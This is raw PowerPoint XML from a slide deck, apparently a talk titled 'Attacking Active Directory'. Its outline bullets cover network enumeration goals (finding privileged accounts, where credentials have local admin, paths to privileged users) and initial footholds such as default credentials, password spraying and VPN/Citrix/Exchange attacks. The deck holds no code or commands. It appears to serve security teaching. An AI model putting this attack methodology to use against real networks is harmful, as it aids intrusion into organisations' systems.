              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>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buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identify the privileged users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Who are they - Accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Where are they - Workstations/Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identify current user(s) access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identify paths to privileged users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75732130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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Network Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E16930-73B6-44FE-B21B-B753AAF54EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857208" y="1661332"/>
            <a:ext cx="8555242" cy="5101932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" marR="0" indent="-457200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr sz="2600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>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buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identify the privileged users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Who are they - Accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Where are they - Workstations/Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identify current user(s) access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Where can this user(s) credentials access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>w/Local Admin preferably</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identify paths to privileged users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33831987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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Initial Footholds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79ECB6EB-49EF-4E79-A9F9-27310E2714E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E7EF697-1BC3-41F7-9758-480DA7881244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="331229" y="1635245"/>
            <a:ext cx="5954233" cy="4963675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D19BBA30-9C4A-412C-BBD8-9F15E4D49BBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6285462" y="1841242"/>
            <a:ext cx="5954233" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Default Credentials Password </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Guessing/Spraying</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>VPN/Citrix/Exchange Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131679795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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Network Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E16930-73B6-44FE-B21B-B753AAF54EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857208" y="1661332"/>
            <a:ext cx="8555242" cy="5101932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" marR="0" indent="-457200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr sz="2600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>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buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identify the privileged users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Who are they - accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Where are they - workstations/servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identify current user(s) access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Where can this user(s) credentials access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>w/Local Admin preferably</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identify paths to privileged users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238772796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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
